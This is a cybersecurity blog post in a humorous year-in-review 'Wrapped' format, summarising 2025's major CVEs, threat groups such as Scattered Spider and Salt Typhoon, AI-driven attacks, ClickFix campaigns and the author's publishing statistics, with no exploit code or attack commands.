Home

Published

- 6 min read

Cybersecurity Wrapped 2025

By William OGOU
Cybersecurity Wrapped 2025 Top CVEs 2025 Ransomware AI Malware React2Shell Salt Typhoon ClickFix Cybersecurity
img of Cybersecurity Wrapped 2025

Welcome to your 2025 Cybersecurity Wrapped.

It’s been a year. We laughed (nervously), we cried (over our budgets), and we patched (endlessly). While you were busy trying to explain to your board why the coffee machine now needs MFA, the threat landscape was evolving faster than a generative AI hallucination.

You spent 8,760 hours defending the perimeter this year. Let’s see what defined your chaos.

What to Remember

  • Social Engineering Spiked: Attackers moved from hacking firewalls to hacking people, with groups like Scattered Spider targeting help desks.
  • AI Weaponization: 2025 marked the shift from experimental AI to weaponized AI, including deepfakes and prompt injection attacks.
  • Major CVEs: React2Shell (CVE-2025-55182) and SharePoint flaws defined the year’s most critical vulnerabilities.
  • State-Sponsored Threats: Groups like Salt Typhoon targeted the internet’s backbone, while North Korean actors funded weapons programs via IT worker fraud.

Top 10 CVEs of 2025

The year 2025 marked a massive acceleration in vulnerability exploitation, with over 21,500 CVEs published in the first half alone. Here are the tracks that broke the internet.

1. CVE-2025-55182 (React2Shell)

  • The “Song of the Year.” Dubbed the “Log4Shell of the modern web,” this flaw in React Server Components allowed unauthenticated RCE via a single HTTP request. It turned the modern frontend into a backend open door.

2. CVE-2025-53770 (SharePoint “ToolShell”)

  • The Enterprise Banger. An unauthenticated deserialization flaw in SharePoint became the preferred entry point for Initial Access Brokers to infiltrate government networks.

3. CVE-2025-61882 (Oracle EBS)

  • The Expensive One. The Cl0p ransomware gang used this RCE to launch one of the most aggressive extortion waves of the year, hitting hundreds of financial firms.

4. CVE-2025-59718 & 59719 (Fortinet)

  • The Gatecrasher. A critical authentication bypass in FortiOS allowed attackers to walk right past the firewall without credentials.

5. CVE-2025-43300 (Apple Image I/O)

  • The Silent Hit. A “Zero-Click” flaw used in spyware campaigns. Your iPhone could be infected just by receiving a malicious image.

6. CVE-2025-32463 (Sudo-Escape)

  • The Classic Remastered. A privilege escalation flaw in Linux’s sudo command required urgent patching across the entire global cloud infrastructure.

7. CVE-2025-6558 (Chrome/WebKit)

  • The Drive-By. A sandbox escape via the ANGLE graphics engine allowed computers to be compromised simply by visiting a website.

8. CVE-2025-10035 (Fortra GoAnywhere)

  • The Sequel. Like the MOVEit hacks of ‘23, this file transfer vulnerability was used to mass-exfiltrate corporate data before encryption.

9. CVE-2025-53690 (Sitecore)

  • The Throwback. Attackers exploited hardcoded machine keys in legacy CMS deployments, hitting thousands of unhardened enterprise sites.

10. CVE-2025-8671 (MadeYouReset)

  • The Remix. An evolution of the HTTP/2 “Rapid Reset” flaw, allowing ultra-efficient DDoS attacks to paralyze web services with minimal effort.

The “Top Artists” of Threat Actors

If threat groups were bands, these were the headliners selling out stadiums (and draining wallets) in 2025.

1. Scattered Spider & The Social Engineers

  • The Vibe: “Hey, it’s IT support. We need your 2FA code.”
  • The Hit Single: The Help Desk Hustle.

In 2025, attackers stopped hacking firewalls and started hacking people. Groups like Scattered Spider and “Luna Moth” targeted Business Process Outsourcing (BPO) firms and help desks, impersonating employees to bypass security controls. From M&S to Cognizant, no one was safe from a smooth talker on the phone.

2. Salt Typhoon

  • The Vibe: Silent, deep, and state-sponsored.
  • The Hit Single: Tele-Comprised.

This Chinese state-aligned group went after the backbone of the internet, breaching major US and Canadian telecom providers (and even the National Guard). They didn’t want ransom; they wanted long-term surveillance on your Cisco routers.

3. North Korean “Laptop Farms”

  • The Vibe: “I’m a legitimate remote worker from Texas.” (Narrator: He was not).
  • The Hit Single: The Paycheck Pivot.

US authorities uncovered massive “laptop farms” where US citizens hosted computers for North Korean IT workers. It wasn’t just about collecting a paycheck; it was about funneling millions to the DPRK weapons program and planting insider threats in Fortune 500 companies.

You listened to a lot of Ransomware this year, but AI Threats really climbed the charts.

Genre 1: AI-Powered Everything

The “experimental” phase is over. Attackers used AI to write better malware, fix code errors in their exploits, and automate reconnaissance.

  • Deepfake Execs: Hackers used deepfake video calls to trick employees into installing malware.
  • Prompt Injection: From Google Gemini leaking emails to Microsoft Copilot data theft, attackers turned our favorite productivity tools into spies. “CometJacking” and “IDEsaster” proved that even your code editor isn’t safe.

Genre 2: The Billion-Dollar Heist

  • Top Track: The ByBit Drain.

In February, North Korea’s Lazarus Group pulled off the crypto-heist of the century, stealing $1.5 Billion from ByBit via a compromised developer machine. It makes Ocean’s Eleven look like petty theft.

Genre 3: “ClickFix” Fatigue

“Update Chrome to view this content.” We saw it everywhere. From fake CAPTCHAs to bogus Word updates, ClickFix campaigns tricked millions into copying and pasting malicious PowerShell scripts. It was the “Rickroll” of malware, but with infostealers instead of Astley.

William Blog’s Cybersecurity Wrapped

While you were reading threat intel, here’s what we published in 2025:

Total Blog Posts Published: 122

By The Numbers:

  • AI Security: 30 posts
  • Cybersecurity: 28 posts
  • Cloud Security: 23 posts
  • Vulnerability Research: 19 posts
  • IAM & Identity: 8 posts
  • Zero Trust: 7 posts
  • Security Operations: 5 posts

Your Blog’s “Top Artist” CVEs: The vulnerabilities that haunted your feed the most:

  1. CVE-2025-53770 (SharePoint ToolShell) — 28 mentions
  2. CVE-2025-55182 (React2Shell) — 24 mentions
  3. CVE-2025-4959618 mentions

More Stats:

  • Average post length: 1,734 words
  • Peak publishing month: April
  • Most-used tags: “vulnerability”, “CISO”, “GCP”, “AI Security”, “RCE”

Your 2026 Vibe Check

Based on your listening history, 2026 is going to be intense.

The trend is shifting from breaking in to breaking trust. With insider threats on the rise and AI agents being weaponized (PromptPwnd), the perimeter is no longer a firewall—it’s identity.

Your Goal for 2026: Stop trusting “users” just because they have a password, and stop trusting “code” just because an AI wrote it.

Basically, if you read 10 posts this year, you’d see SharePoint mentioned 2-3 times. SharePoint really said “never log off.”

Happy New Year 2026! Stay patched.

To further enhance your cloud security and implement Zero Trust, contact me on LinkedIn Profile or [email protected]

Frequently Asked Questions (FAQ)

What was the biggest financial hack of 2025?

The Lazarus Group's theft of $1.5 Billion from ByBit via a compromised developer machine was the largest crypto-heist of the year.

What is React2Shell?

React2Shell (CVE-2025-55182) was a critical vulnerability in React Server Components that allowed unauthenticated Remote Code Execution (RCE), impacting modern web frontends.

What is the 'ClickFix' attack method?

ClickFix campaigns trick users into copying and pasting malicious PowerShell scripts to 'fix' fake errors like browser updates or CAPTCHAs.

Who are Scattered Spider?

A threat group known for social engineering attacks against help desks and BPO firms to bypass security controls and gain access to corporate networks.

What should security teams focus on for 2026?

The focus is shifting from perimeter defense to identity security ('breaking trust'), insider threats, and securing against weaponized AI agents.

Resources

  • Lazarus Group ByBit Heist Reports: Analysis of the $1.5B theft.
  • React2Shell (CVE-2025-55182) Advisories: Technical details on the critical React flaw.
  • Salt Typhoon Telecom Breach Analysis: Reports on state-sponsored telecom infiltration.
  • SharePoint ToolShell (CVE-2025-53770) Guidance: Patching and mitigation strategies.
  • ClickFix Campaign Research: Threat intelligence on the fake update malware campaigns.
William OGOU

William OGOU

Need help implementing Zero Trust strategy or securing your cloud infrastructure? I help organizations build resilient, compliance-ready security architectures.

Connect on LinkedIn